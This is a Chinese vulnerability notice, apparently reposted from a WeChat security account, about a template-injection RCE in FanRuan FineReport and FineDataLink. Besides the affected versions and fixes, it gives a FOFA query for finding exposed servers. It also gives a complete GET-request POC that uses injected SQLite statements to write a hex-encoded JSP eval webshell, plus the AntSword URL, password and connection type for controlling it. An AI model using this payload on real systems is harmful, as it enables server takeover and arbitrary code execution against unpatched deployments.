漏洞描述:
帆软 /webroot/decision/view/ReportServer接口存在SSTI模板注入漏洞,攻击者通过构造特殊 uri 请求参数注入到模板中,最终可执行任意代码控制服务器。
空间语法:
fofa:
app
=
"帆软-FineReport
攻击效果:
影响版本:
帆软
FineReport
V10
、
V11
(最新版)
FineDataLink
4
.1
.10
.3
及以下版本
漏洞修复:
1、删除 sqlite 驱动:请从工程的 webappswebrootWEB-INFlib 目录中删除sqlite-jdbc-x.x.x.xjar驱动文件,并重启工程以完成更改。
2、调整配置文件:在url.properties文件中,请添加以下规则:rule3=/view/ReportServer、rule4=/view/ReportServer/。
3、安装 web 应用防火墙插件:请安装并配置相应的最新版 Web 应用防火墙插件。
POC
GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Ftesttest.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
host: xxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
蚁剑连接地址:http://地址/webroot/testtest.jsp?a=javax.script.ScriptEngineManager
蚁剑连接密码:b
连接类型选择:JSPJS
原文始发于微信公众号(光剑安全):【漏洞通报】最新帆软工具RCE漏洞POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论